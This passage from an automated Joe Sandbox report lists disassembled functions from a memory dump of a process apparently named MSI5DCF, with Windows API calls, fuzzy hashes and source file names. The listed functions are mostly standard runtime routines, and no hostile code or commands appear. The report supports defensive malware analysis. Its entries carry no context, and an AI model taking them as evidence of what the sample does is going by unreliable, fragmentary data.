                                                                        • ResetEvent.KERNEL32(?,00AD2627,00B3571C,00B1CCC0), ref: 00AF78F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                        • String ID:
                                                                        • API String ID: 3916383385-0
                                                                        • Opcode ID: 7aa712466cfd02a724a4a7d6394ad2c3b521682f0c5bfafeda5a2280698c3b25
                                                                        • Instruction ID: bbde7faf8f2b50895b582059782627b9e219ab894cc5aa1aabe033f60ccf9e81
                                                                        • Opcode Fuzzy Hash: 7aa712466cfd02a724a4a7d6394ad2c3b521682f0c5bfafeda5a2280698c3b25
                                                                        • Instruction Fuzzy Hash: E6018C35A45220DBC708AF58FD08AAD7BA4FB09701B11406AF90293320CF746D01DBD4
                                                                        Function 00AD6090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD60F4
                                                                        • GetLastError.KERNEL32 ref: 00AD6190
                                                                          • Part of subcall function 00AD1FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,00B1938D,000000FF,?,80070057,?,?,00000000,00000010,00AD1B09,?), ref: 00AD2040
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,00B2B2DC,00000001,00000000), ref: 00AD614E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                        • String ID: ntdll.dll
                                                                        • API String ID: 4113295189-2227199552
                                                                        • Opcode ID: cfb371267356570601def1ad1de400bd8ed51306576288f900a0a97a02ba878b
                                                                        • Instruction ID: c5caa92878494fae4e45350ce1f5f073d547da016b1071456044b738288adf96
                                                                        • Opcode Fuzzy Hash: cfb371267356570601def1ad1de400bd8ed51306576288f900a0a97a02ba878b
                                                                        • Instruction Fuzzy Hash: 60319D71A00608DBD720DF68DD44BAEB7F4BB54710F14861EF42AD72D1EBB4A904CB90
                                                                        Function 00AED2C2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AED2C9
                                                                          • Part of subcall function 00AE6FF9: _Maklocstr.LIBCPMT ref: 00AE7019
                                                                          • Part of subcall function 00AE6FF9: _Maklocstr.LIBCPMT ref: 00AE7036
                                                                          • Part of subcall function 00AE6FF9: _Maklocstr.LIBCPMT ref: 00AE7053
                                                                          • Part of subcall function 00AE6FF9: _Maklocchr.LIBCPMT ref: 00AE7065
                                                                          • Part of subcall function 00AE6FF9: _Maklocchr.LIBCPMT ref: 00AE7078
                                                                        • _Mpunct.LIBCPMT ref: 00AED356
                                                                        • _Mpunct.LIBCPMT ref: 00AED370
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 2939335142-1686923651
                                                                        • Opcode ID: 8828b97f2e43bd17667a843745fd77dd7a46e6bbe44dad1d579d59f996f484a0
                                                                        • Instruction ID: 43e4da4f886da0cfa18ec887643dba9e3161de1d758dbe6baa3814ad2cb0be7b
                                                                        • Opcode Fuzzy Hash: 8828b97f2e43bd17667a843745fd77dd7a46e6bbe44dad1d579d59f996f484a0
                                                                        • Instruction Fuzzy Hash: 0221A1B1904B926FDB25DF75C89077BBEF8AB0D300F044A5AE199C7A42D734E601CB90
                                                                        Function 00AF4DF4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Mpunct$H_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 4281374311-1686923651
                                                                        • Opcode ID: c6ff1963ac976079a106a3133f4a39fd7807618770b8e172dc2f4cc24bd4a3aa
                                                                        • Instruction ID: 4a57d176512c344700c5579bf193d6a42d1ee55697fefcd8da92a1289649b545
                                                                        • Opcode Fuzzy Hash: c6ff1963ac976079a106a3133f4a39fd7807618770b8e172dc2f4cc24bd4a3aa
                                                                        • Instruction Fuzzy Hash: 322181B1904A966EDB25DFB5C4907BBBEF8BB0D700F04495AB159C7A41D734E601CB90
                                                                        Function 00AFC012 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00AFBFC3,00000000,?,00B34EA4,?,?,?,00AFC166,00000004,InitializeCriticalSectionEx,00B1F92C,InitializeCriticalSectionEx), ref: 00AFC01F
                                                                        • GetLastError.KERNEL32(?,00AFBFC3,00000000,?,00B34EA4,?,?,?,00AFC166,00000004,InitializeCriticalSectionEx,00B1F92C,InitializeCriticalSectionEx,00000000,?,00AFBF1D), ref: 00AFC029
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00AFC051
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3177248105-2084034818
                                                                        • Opcode ID: 0de2dac4c95b2f3a5be0c12e73f5999199c53ef7ce1b12840a119bd4a9ac97bf
                                                                        • Instruction ID: a817c40686221c83e2d65c0145dd3408d44c53d6648c5fc4a411d9d34cb9660a
                                                                        • Opcode Fuzzy Hash: 0de2dac4c95b2f3a5be0c12e73f5999199c53ef7ce1b12840a119bd4a9ac97bf
                                                                        • Instruction Fuzzy Hash: 97E0123064020CF7DF201BA1ED0ABA93B659B04B61F604420FA0CE50E0DF61E95295C4
                                                                        Function 00ADE350 Relevance: 6.4, APIs: 4, Instructions: 426COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLocal_strcspn
                                                                        • String ID:
                                                                        • API String ID: 2585785616-0
                                                                        • Opcode ID: b267cb14784408047c6643dde9b75911f4b447b8fd61c6bc8f75a0b788ffd232
                                                                        • Instruction ID: d82387f53404195a8e29d1a3252c2dca2daf6bd6d4a5c0a553df3107d90cb81d
                                                                        • Opcode Fuzzy Hash: b267cb14784408047c6643dde9b75911f4b447b8fd61c6bc8f75a0b788ffd232
                                                                        • Instruction Fuzzy Hash: A9F12575A002499FDF14DFA8C984AEEBBF6FF48304F14416AE816AB351D731EA45CB90
                                                                        Function 00B1738B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(B7207CF4,?,00000000,?), ref: 00B173EE
                                                                          • Part of subcall function 00B1002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B0C527,?,00000000,-00000008), ref: 00B100D7
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B17649
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B17691
                                                                        • GetLastError.KERNEL32 ref: 00B17734
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                        • String ID:
                                                                        • API String ID: 2112829910-0
                                                                        • Opcode ID: f74626d61def07980e07611611668e62bef2af0ba7d5414a338838c04a4ce89c
                                                                        • Instruction ID: f9dd7e26b69d1d2a7952482b8fdbb258e7f77c9e0e9e75df94912a2273119852
                                                                        • Opcode Fuzzy Hash: f74626d61def07980e07611611668e62bef2af0ba7d5414a338838c04a4ce89c
                                                                        • Instruction Fuzzy Hash: 8DD16BB5E046489FCB15CFA8D8809EDBBF5FF48300F6445AAE855E7391DB30A982CB50
                                                                        Function 00AE8872 Relevance: 6.3, APIs: 4, Instructions: 313COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                        • String ID:
                                                                        • API String ID: 838279627-0
                                                                        • Opcode ID: 84cfdaf71f004bf55877096ba50f24075ff529ee2cd537e0f7cfaa9bbd42d0f3
                                                                        • Instruction ID: 454febaf46d237a90a67da655e315c049bf82c23a89c6fb6228f9f8a9aa526ce
                                                                        • Opcode Fuzzy Hash: 84cfdaf71f004bf55877096ba50f24075ff529ee2cd537e0f7cfaa9bbd42d0f3
                                                                        • Instruction Fuzzy Hash: B7C16C71D00289DFDF14DF99C9819EEBBB9FF48310F14406AE809AB251DB34AE45CBA1
                                                                        Function 00AE2A16 Relevance: 6.3, APIs: 4, Instructions: 310COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                        • String ID:
                                                                        • API String ID: 838279627-0
                                                                        • Opcode ID: f87b4940bb87bdc80d2df141f57534d119983bc44ea933acb4487deba7bf6bad
                                                                        • Instruction ID: c2d4fe9fd8be8446f848f097b3c656681d86b3ee22cccc8abe423af6e17f1595
                                                                        • Opcode Fuzzy Hash: f87b4940bb87bdc80d2df141f57534d119983bc44ea933acb4487deba7bf6bad
                                                                        • Instruction Fuzzy Hash: 8EC16D71D002899FDF15DFE5C981AEEBBB9FF48310F24442AE405AB251D734AE45CBA1
                                                                        Function 00AF4F20 Relevance: 6.3, APIs: 4, Instructions: 277COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF4F27
                                                                        • collate.LIBCPMT ref: 00AF4F33
                                                                          • Part of subcall function 00AF3E70: __EH_prolog3_GS.LIBCMT ref: 00AF3E77
                                                                          • Part of subcall function 00AF3E70: __Getcoll.LIBCPMT ref: 00AF3EDB
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • __Getcoll.LIBCPMT ref: 00AF4F76
                                                                          • Part of subcall function 00AF3CD4: __EH_prolog3.LIBCMT ref: 00AF3CDB
                                                                          • Part of subcall function 00AF3CD4: std::_Lockit::_Lockit.LIBCPMT ref: 00AF3CE5
                                                                          • Part of subcall function 00AF3CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3D56
                                                                          • Part of subcall function 00AE4403: __EH_prolog3.LIBCMT ref: 00AE440A
                                                                          • Part of subcall function 00AE4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AE4414
                                                                          • Part of subcall function 00AE4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE44BB
                                                                        • numpunct.LIBCPMT ref: 00AF51A6
                                                                          • Part of subcall function 00AD84C0: LocalAlloc.KERNEL32(00000040,00000000,00AF839D,00000000,B7207CF4,?,00000000,?,00000000,?,00B1CB8D,000000FF,?,00AD17D5,00000000,00B1D3BA), ref: 00AD84C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
                                                                        • String ID:
                                                                        • API String ID: 2732324234-0
                                                                        • Opcode ID: 9b1ef92797df96bf9c5e7e6bd354bda78fb5001f0ea0a8e9ac92a2c8f21ff20c
                                                                        • Instruction ID: 9f3284cfb4074da907ceda5d41af8482705bae4e271cea729335ea7b2e45c8f7
                                                                        • Opcode Fuzzy Hash: 9b1ef92797df96bf9c5e7e6bd354bda78fb5001f0ea0a8e9ac92a2c8f21ff20c
                                                                        • Instruction Fuzzy Hash: 1791C7B2D00619ABDB20ABF58902B7F7EF8EF45760F11451EFA5997281EF74890087E1
                                                                        Function 00AFAFD5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: 5979f58842caa2f3ca8cd6303c8b6bdd40d460da531e132d3ce13c70248eabb0
                                                                        • Instruction ID: 6298386e09d40a594d6f9ccc5e49e64b2505be7b141527de4790f445afa952e4
                                                                        • Opcode Fuzzy Hash: 5979f58842caa2f3ca8cd6303c8b6bdd40d460da531e132d3ce13c70248eabb0
                                                                        • Instruction Fuzzy Hash: 5D51B07661020EAFDB299F94D951BBBB7B4EF04350F244529FE1287291EB35EC40CBA4
                                                                        Function 00B07B18 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e055b3f79dad6f80d373905f4b5e91da1416ae164075e513f5ec08e3d8ecd617
                                                                        • Instruction ID: 6fe80d4ce3420cf5807e0c29617e645468da365a60513977e8b1a3b4a9d3808c
                                                                        • Opcode Fuzzy Hash: e055b3f79dad6f80d373905f4b5e91da1416ae164075e513f5ec08e3d8ecd617
                                                                        • Instruction Fuzzy Hash: C0216F71A48209BFDB20AF718D91D6ABBE9EF4036471089A5FA15D7291EF31FC5087A0
                                                                        Function 00AD9020 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,00000000,75EF5490,00AD8B3A,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD9027
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                        • API String ID: 1452528299-1781106413
                                                                        • Opcode ID: 854aa65223e2f1157a8dc50b1c6699f64f28fa761c5d440f7878d2a491e3cd21
                                                                        • Instruction ID: f49de6ff9c7e71edb073ef63b18e0b9d952788d3abfe249c0c436d1f08c41bee
                                                                        • Opcode Fuzzy Hash: 854aa65223e2f1157a8dc50b1c6699f64f28fa761c5d440f7878d2a491e3cd21
                                                                        • Instruction Fuzzy Hash: 59217949A2026186CB301F28A41173AB2F0AF64755F28446FE8CADB394EE69CC82C391
                                                                        Function 00AE4403 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE440A
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE4414
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE44BB
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00AE44C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                        • String ID:
                                                                        • API String ID: 4244582100-0
                                                                        • Opcode ID: b78170012a81fa39c79d76983dd328f5ad6dbcd09836111ac8e23e1107ab38d9
                                                                        • Instruction ID: 29cc922d6895450b7fdb7538d9f519d2966d27a66c1b6ab2126c053575aa1b1f
                                                                        • Opcode Fuzzy Hash: b78170012a81fa39c79d76983dd328f5ad6dbcd09836111ac8e23e1107ab38d9
                                                                        • Instruction Fuzzy Hash: 81213935A00A169FDB04EF25C891AADB7B5FF49710F008559E9269B7E1DF30ED50CB80
                                                                        Function 00AE1400 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,B7207CF4), ref: 00AE143C
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AE145C
                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AE148D
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AE14A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                        • String ID:
                                                                        • API String ID: 3604237281-0
                                                                        • Opcode ID: 0b5c28edc6fb9991b90a07768a99b2ed98f34a2a86077f21a1a0ea87e5142e89
                                                                        • Instruction ID: 11c7b48899e98e5bcde0d1993f494a72c065ab7fbe1f1574cb911e9d66e1e6df
                                                                        • Opcode Fuzzy Hash: 0b5c28edc6fb9991b90a07768a99b2ed98f34a2a86077f21a1a0ea87e5142e89
                                                                        • Instruction Fuzzy Hash: 1321B1B1940314ABD7208F54DC09F9ABBF8EB09B24F204259F504A72D0DBB45A05C794
                                                                        Function 00AE80C5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE80CC
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE80D6
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE8127
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8147
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 32ba888eb57a0f23f0118058bfc591b696391c54707d38737355e36ed2168e16
                                                                        • Instruction ID: 6121ec917bd9ed4ae44f44bfe595d2311756ca6069fe03fc68ffd5be67615048
                                                                        • Opcode Fuzzy Hash: 32ba888eb57a0f23f0118058bfc591b696391c54707d38737355e36ed2168e16
                                                                        • Instruction Fuzzy Hash: A301F571D00299DBCF00EBA4DA456BE77B1AF80710F250549F5256B3D2DF38AE02CB90
